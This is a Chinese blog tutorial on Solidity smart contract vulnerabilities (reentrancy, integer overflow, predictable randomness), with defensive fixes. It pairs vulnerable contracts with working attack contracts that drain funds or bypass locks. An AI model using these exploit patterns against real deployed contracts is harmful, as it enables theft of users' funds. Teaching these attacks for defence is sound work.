智能合约安全漏洞与解决方案

已于 2023-11-23 09:01:12 修改
阅读量1.1k 收藏
点赞数 1
文章标签: 智能合约 区块链
于 2023-11-22 18:33:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yz2015/article/details/134559263
版权 
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

import "https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.3/contracts/math/SafeMath.sol";

/*
   智能合约安全
   在智能合约中安全问题是一个头等大事,因为智能合约不像其他语言一样可以边制作边修改,而智能合约一旦部署将无法修改

   重入攻击 如果合约中有重入攻击的漏洞,对方就可以利用该漏洞对合约进行攻击 版本0.8以下可复现
   重入攻击原理:攻击合约调用对方提现,对方提现回调本合约的回退函数,回退函数里又调用了对方提现,形成了递归调用,直到把对方账户取光,或取到指定金额,自己加判断
  
   解决方案1:在提现方法,先减掉金额再调用转账,这样攻击合约下次调用的时候,余额不足不满足条件
   解决方案2:使用重入锁方案,定义重入锁,noReentrant原理:提现方法执行完毕会修改锁的状态改为false,当攻击合约下次重入调用的时候,因为上次方法还没有执行完毕,锁状态还是true,所以无法再调用提现具体逻辑,这时候重入锁阻拦住了重入攻击,如果不确定合约逻辑是否有重入漏洞,不妨加入一个重入锁,防止函数被重入攻击,在实际生产环境最好加上重入锁
*/
contract EtherStore {
    mapping(address => uint) public balances;

    // 定义重入锁变量
    bool internal locked;
    // 定义重入锁修改器
    modifier noReentrant() {
        require(!locked, "No re-entrancy");
        locked = true;
        _;
        locked = false;
    }

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint _amount) public noReentrant {
        require(balances[msg.sender] >= _amount);
        (bool sent, ) = msg.sender.call{value: _amount}("");
        require(sent, "Failed to send Ether");
        balances[msg.sender] -= _amount;
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

// 攻击合约
contract Attack {

    EtherStore public etherStore;

    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }

    // 回退函数
    fallback() external payable {
        // 为了避免死循环,加判断
        if (address(etherStore).balance >= 1 ether) {
            // 提现
            etherStore.withdraw(1 ether);
        }
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        // 存款
        etherStore.deposit{value: 1 ether}();
        // 提现
        etherStore.withdraw(1 ether);
    }

    function getBalacne() public view returns (uint) {
        return address(this).balance;
    }

    // 接收攻击获得的Eth
    //receive() external payable {}
}


/*
  整数溢出漏洞
  uint = uint256  取值范围:0 - 2**256-1  
  数字上溢:如果数字超过2**256,比如uint256最高位 +3 , 会重新会到0来一次循环,最终结果是2,数字变的非常小。
  数字下溢:如果数字低于0,比如最低位 -2,则会反向从uint256最高位处开始循环,变成2**256-2,变成了巨大的数字

  示例,定义时间锁合约
*/
contract TimeLock {
    // 使用openzepplin的安全库 uint myUint;  myUint.add(123);
    using SafeMath for uint;

    // 账本
    mapping(address => uint) public balances;
    // 提现锁定期,到期可提现
    mapping(address => uint) public lockTime;

    function deposit() external payable {
        // 记录存款,同时记录锁定时间 当前时间1个星期之后才可以解锁,不到期不能执行提现方法
        balances[msg.sender] += msg.value;
        lockTime[msg.sender] = block.timestamp + 1 weeks;
    }

    // 增加锁定时间 这个加法有可能产生数学溢出
    function increaseLockTime(uint _secondsToIncrease) public {
        //lockTime[msg.sender] += _secondsToIncrease;
        // 使用安全库,防止数学溢出 加完会验证结果是否比原来更大
        lockTime[msg.sender] = lockTime[msg.sender].add(_secondsToIncrease);
    }

    function withdraw() public {
        // 判断用户余额
        require(balances[msg.sender] >0, "Insufficient funds");
        // 当前时间要大于用户锁定的时间,比如用户锁定期为1周,当前是第二周,现在就可以执行该方法
        require(block.timestamp > lockTime[msg.sender], "Lock time not expired");
        uint amount = balances[msg.sender];
        balances[msg.sender] = 0;
        (bool sent, ) = msg.sender.call{value: amount}("");
        require(sent, "Failed to send Ether");
    }
}

// 用于验证数字溢出漏洞,该合约无其他意义
contract TimeLockAccack {
    TimeLock timeLock;

    constructor(TimeLock _timeLock) {
        timeLock = TimeLock(_timeLock);
    }

    fallback() external payable {}

    function attack() public payable {
        // 向TimeLock存款,同时该方法会记录存款到期时间,默认一周
        timeLock.deposit{value: msg.value}();

        // 调用增加存款到期时间的方法 虽然withdraw()方法有锁定期,但让锁定时间数学溢出,也可以马上执行withdraw()
        // 计算巨大的数字,让它产生数学溢出 首先获取当前用户的锁定时间
        // 计算公式 t = 当前锁定时间,要找到x是多少,要满足的条件是: x + t = 2**256 = 0
        // x = -t  调用这个方法,实际会把取款时间改为0
        timeLock.increaseLockTime(
            uint(-timeLock.lockTime(address(this)))
        );
        // 提现
        timeLock.withdraw();
    }
}

使用OpenZeppelin安全库,防止了数字溢出漏洞攻击,报出了SafeMath错误:

不安全写法:lockTime[msg.sender] += _secondsToIncrease;

安全写法:    lockTime[msg.sender] = lockTime[msg.sender].add(_secondsToIncrease);

整数溢出真实案例:

2018年4月22日,黑客利用以太坊ERC-20智能合约中数据溢出的漏洞攻击蔡文胜旗下美图合作的公司美链 BEC 的智能合约,成功地向两个地址转入了巨量BEC代币,导致市场上海量BEC被抛售。

BEC合约代码:计算批量转账总金额没有使用SafeMath,转账金额输入2的255次方值,会发生整数上溢出漏洞,导致amount变成了0,代码向下执行,直接把币全都转走了。写代码的人减法运算和加法运算分别使用了SafeMath的sub和add,唯独乘法运算没用。

随机数攻击,就是针对智能合约的随机数生成算法进行攻击,预测生成结果。目前区块链上很多合约都是采用的链上信息,如区块时间戳、未来区块哈希等作为游戏合约的随机数源,使用这种随机数被称为伪随机数,它不是真的随机数,存在被预测的可能。一旦生成算法被攻击者猜到,或通过逆向方式拿到,攻击者就可以实现预测,达到攻击目的
解决方案:使用安全的随机数源,第三方api或预言机获取随机数

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/*
  随机数攻击示例,玩家抽奖,抽中获取奖励,代码主要演示随机数漏洞部分,攻击者合约利用对方随机数生成部分,也用相同的方式生成随机数实现预测中奖
  生产真实案例,如EOS伪随机数漏洞
*/
contract Random {
    // 生产随机数确定是否中奖,如果中奖则转账给中奖者
    function guess() public payable {
        // 获取随机数,确定是否中奖
        bool result = _getRandom();
        if(result){
            // 中奖,获得1个eth奖励
            bool ok = payable(msg.sender).send(1 ether);
            if(!ok){

            }
        }
    }
    // 获取随机数函数,并确定是否中奖
    function _getRandom() private view returns(bool){
        uint256 random = uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp)));
        if(random%2==0){
            return false;
        }
        return true;
    }
    // 查看奖池余额
    function getBalance() external view returns(uint256){
        return address(this).balance;
    }
    // 设置部署时转入ETH
    constructor() payable{}
    // 允许接收ETH
    receive() external payable{}
}

// 攻击者合约
contract Attack {
    event Log(string);

    function attack(address _random) external payable {
        for(;;){
            // 1. 判断攻击目标合约的余额,如果小于1个ether,表示取光,就返回
            if(payable(_random).balance < 1){
                emit Log("succes getting eth");
                return;
            }
            // 2. 计算由当前区块的难度值和时间戳产生的哈希值,用作随机数
            // 如果随机数是偶数,表示本区块不会中奖,先返回,等待下一个区块
            if(uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp))) %2 ==0){
                emit Log("failed to get rand,wait 10 seconds");
                return;
            }
            emit Log("start accack!!!");
            // 3. 如果随机数是奇数,表示已经中奖,那么立刻调用攻击目标的guess函数,获取奖励
            (bool ok,) = _random.call(abi.encodeWithSignature("guess()"));
            if(!ok){
                emit Log("failed to call guess()");
                return;
            }
        }
    }

    // 查看余额
    function getBalance() external view returns(uint256){
        return address(this).balance;
    }

    // 接收攻击获得的Eth
    receive() external payable {}
}

niceyz
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
智能合约安全分析 简述
huhuiwen99的博客
03-25 1595
记录一下学习过程,不断更新 智能合约背景 以太坊正在被打造成一种能在单一平台上实现多种可能性的区块链生态系统,而智能合约是为了让人们在平台上实现更深层次的开发而设计的。 智能合约的价值主要是因为它可以与区块链发生关系,数据来源于区块链链上,执行在链上,输出结果在区块链上,而区块链上承载着一个国家的法律,这是区块链被称为“主权区块链”的原因。智能合约区块链的结合形成了智能合约法规自动执行系统。 智...
区块链安全-智能合约的安全与防护.pdf
08-08
这些方法包括利用开源检测工具,比如Mythril进行智能合约的静态安全分析、Oyente进行智能合约的静态安全分析、Porosity进行智能合约的反编译与静态安全分析、Ethersplay和Evmdis进行EVM(以太坊虚拟机)的反汇编等。...
智能合约开发中13种最常见的漏洞
以择人之心择己,以恕己之心恕人。
06-06 7640
1.重入攻击 2.整数溢出和下溢 3.未授权访问 4.不当的继承顺序 5.短地址攻击 6.断言失败 7.代理模式中的初始化漏洞 8.时间依赖性漏洞 9.Gas限制和DoS攻击 10.权限管理不当 11.外部调用 12.随机数生成 13.存储和计算效率
智能合约 -- 常规漏洞分析 + 实例
本郡主是喵
08-11 4229
在上面的代码片段中我们可以看到,distribute() 函数中会去遍历投资者数 组,但是合约的循环遍历数组是可以被外部的人进行人为扩充,如果有攻 击者要攻击这个合约,那么他可以创建多个账户加入投资者的数组,让 investors 的数据变得很大,大到让循环遍历数组所需的 gas 数量超过区块 gas 数量的上限,此时 distribute() 函数将无法正常操作,这样就会造成该 合约的拒绝服务攻击。第一去取钱,状态变量修改为true,从而将函数锁住,必须等这次函数执行完毕,才能重新对函数进行调用。
智能合约漏洞篇:常见漏洞介绍及整数溢出漏洞分析
Reveone的博客
09-16 1071
智能合约是运行在区块链上的自动执行代码。由于它们的不可逆性和与金钱相关的特性,智能合约的安全问题受到了广泛关注。整数溢出与下溢:当整数变量的值超出其允许的范围时,可能会发生溢出或下溢,导致不可预测的结果。重入攻击:在一个函数调用中,被调用的合约再次调用原函数,可能导致不希望的多次执行。例如,著名的DAO攻击就是重入攻击的一种。短时间浮动:在区块链上,时间和块高度可以被操纵。攻击者可以利用这点,通过挖矿操作来操纵合约的时间逻辑。随机性问题:在以太坊等区块链平台上,产生随机数是有挑战的,因为所有信息都是公开的。
《我学区块链》—— 三十四、以太坊智能合约静态安全分析
xuguangyuansh的博客
10-29 888
三十四、以太坊智能合约静态安全分析 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;以太坊的智能合约代码审计,笔者找到两种方式:一是 CertiK,一个提供智能合约安全服务的区块链平台,是一条公链系统,采用 PoP(proof-of-proof)共识机制,用来分析合约需要消耗该区块链平台的原生数字币;二是使用本地化的静态安全分析工具。本篇将主要介绍本地化的静态安
区块链智能合约的数据安全:如何保护用户信息
程序员光剑
12-26 1429
1.背景介绍 区块链技术是一种分布式、去中心化的数据存储和交易方式,它的核心概念是将数据存储在一个由多个节点组成的链表中,每个节点称为区块,每个区块包含一定数量的交易数据。智能合约则是一种自动化的协议,它可以在区块链上自动执行一些预定的操作。这两种技术结合起来,可以实现一种高度安全、透明、去中心化的数据交易方式。 然而,随着区块链智能合约的普及,数据安全问题也逐渐成为了人们关注的焦点。这篇文...
以太坊智能合约安全漏洞之整数溢出漏洞的原理与解决方法
StevenX5
04-30 3985
以太坊虚拟机 (EVM) 为整数指定固定大小的数据类型。这意味着一个整数变量,只能表示一定范围的数字。例如uint8 只能存储 [0,255] 范围内的数字。尝试将 256 存储到 uint8 将导致 0。如果不小心,用户输入未被检查,并且执行的计算结果超出了存储它们的数据类型的范围,那么 Solidity 中的变量可能会被利用。本文通过整数溢出漏洞原理的阐述,并结合 Solidity 智能合约实例代码的演示,介绍了一种智能合约整数溢出漏洞及其解决方法。
区块链智能合约安全分析.pptx
06-01
### 区块链智能合约安全分析 #### 一、智能合约漏洞类型分析 **1. 输入验证缺陷** - **缺乏输入验证**:智能合约如果未能有效地验证用户输入的数据,则可能会受到攻击者的非法输入,进而触发异常行为或者未经授权...
区块链智能合约的安全性.pptx
06-01
通过上述对智能合约安全性威胁的深入探讨及对其漏洞分类的细致分析,我们可以看出智能合约的安全性是一项复杂而重要的任务。为了确保智能合约的安全可靠,必须采用多种审计方法进行综合评估,包括但不限于静态分析、...
区块链智能合约开发工具的安全性.pptx
06-01
### 一、区块链智能合约安全性评估框架 #### 1. 智能合约安全审计 - **全面审查**:对智能合约代码进行彻底审查,目的是识别任何可能导致安全问题的因素,如重入攻击、权限升级和整数溢出等。 - **评估标准**:...
降真智能合约安全性.pptx
05-27
### 降真智能合约安全性研究 #### 一、降真智能合约攻击类型分析 ##### 1.1 整数溢出攻击 - **定义**: 整数溢出是一种编程错误,当运算结果超出数据类型所能表示的最大范围时,程序会出现异常行为。 - **影响**: ...
如何通俗易懂的解释TON的智能合约
最新发布
zhuqiyua的博客
09-09 585
在TON区块链中,如果某个分片链的交易量过大,可以将其分割成更小的分片链,以减轻单个分片的负担。这个比喻中的“中心邮局”对应于英文中的“Masterchain”,它是TON区块链中的一个特殊链,用于同步所有分片链的状态,并确保整个系统能够达成共识。每个智能合约都是一个独立的演员,它们在TON的舞台上演绎着自己的故事,通过消息传递与其他演员互动,共同构建了一个复杂而有序的区块链世界。随着戏剧节的进行,信件的数量越来越多,为了避免信件处理的混乱,小镇的智者决定将广场分成几个区域,每个区域都有自己的信箱管理人。
MelosBoom vs. Google Nest: 打造未来智能家居的去中心化之路
weixin_53694853的博客
09-06 926
MelosBoom 的出现,为这一领域带来了新的突破,其去中心化的网络架构和独特的 AI 驱动能力,正重新定义未来智能家居的标准。面向传统互联网在用户数据经济市场的竞争赛道,也是Web3项目少有的继续在“协议”、“流动性”、“金融”挣扎的应用型项目,与传统TVL竞争的项目逻辑不同,MelosBoom更加看重本身的技术实现与参与用户的数量。更重要的是,用户完全掌控自己的数据,决定其使用方式和分享对象,在足够安全的前提下并且能够有选择,有偿的出售个人数据。智能家居的巨大市场潜力更来源于其巨大的未来发展场景。
Behind the Code:与 Rakic 和 Todorovic 对话 OriginTrail 如何实现 AI 去中心化
CryptoBuffett的博客
09-05 1315
它可以以去中心化的方式访问不同来源的知识资产,同时维护数据所有权和知识产权,并且提供可验证性,从而精确确定某个知识资产的来源,并将其作为 AI 的输入。迄今为止,平行链的运行非常顺利,没有出现停机现象,拥有独立的治理结构和所有可用的 Pallet,这是 Polkadot 从一开始就做对的地方。另一方面是 “知识网络” 的概念,这一概念最早由万维网的创始人蒂姆·伯纳斯·李提出,他也是 “Web 3.0” 这一术语的最初提出者,该术语最初被称为 “语义网”,如今则体现在知识图谱的概念中。
qmt量化交易策略小白学习笔记第61期【qmt编程之期权行情数据--get_market_data_ex函数】
fanglue3705的博客
09-09 462
获取期权行情数据 获取期权最新数据,首先需要进行数据订阅。完成合约订阅后,用get_market_data_ex函数即可提取相关信息。这个过程包含两大步骤: 第一,通过订阅操作确保能接收到你感兴趣的期权合约的更新; 第二,调用get_market_data_ex函数来实际获取并处理这些订阅到的数据,如果需要用到历史数据或过期合约数据,需要使用download_history_data进行下载。
以太坊开发环境
禅与代码的艺术
09-07 1081
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
区块链 + 人才服务】区块链职业技能竞赛平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
09-09 268
区块链职业技能竞赛平台基于 FISCO BCOS 联盟链提供了可靠、安全、高效的区块链服务,带来多方面的成效与意义。
未来的去中心化网络:Web3与AI的深度融合探讨
weixin_44672358的博客
09-09 749
在数字技术的快速发展下,Web3和人工智能(AI)正逐步成为未来互联网的核心支柱。Web3作为一种去中心化的网络架构,致力于重塑互联网的基本结构,而AI则通过智能化技术提升了数据处理和决策的能力。二者的深度融合不仅推动了技术的创新,也为各个行业带来了全新的机遇与挑战。本文将深入探讨Web3与AI的结合如何推动去中心化网络的发展,并展望未来的数字化前景。
简单论述如何修复智能合约漏洞
07-13
修复智能合约漏洞是一个复杂的过程,需要仔细分析合约代码并采取适当的措施来解决问题。以下是一些常见的方法来修复智能合约漏洞: 1. 审查代码:仔细审查智能合约的代码,特别关注可能导致漏洞的部分,例如输入验证、边界检查和权限控制等。确保代码逻辑正确且没有潜在的安全问题。 2. 更新合约:如果发现合约中存在漏洞,可以通过更新合约来修复漏洞。这可能涉及修改代码、添加新功能或删除不安全的部分。确保在更新合约时遵循最佳实践和安全标准。 3. 安全审计:聘请专业的安全审计团队对合约进行审计,他们会帮助发现潜在的漏洞并提供修复建议。安全审计可以帮助确保合约符合最佳实践和安全标准。 4. 引入多重签名:使用多重签名机制可以增加合约的安全性。这样需要多个签名才能执行关键操作,有效降低了合约被攻击的风险。 5. 强化权限控制:确保只有授权用户才能执行敏感操作。通过添加适当的权限控制和身份验证机制来限制对合约的访问和执行操作的权限。 6. 持续监控和更新:合约修复不是一次性的工作,需要持续监控合约的安全性,并及时更新合约以应对新的安全威胁和漏洞。 请注意,修复智能合约漏洞是一个复杂的过程,需要确保合约的安全性和正确性。因此,建议在进行修复之前仔细评估和测试修复方案,并寻求专业的安全团队的帮助。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值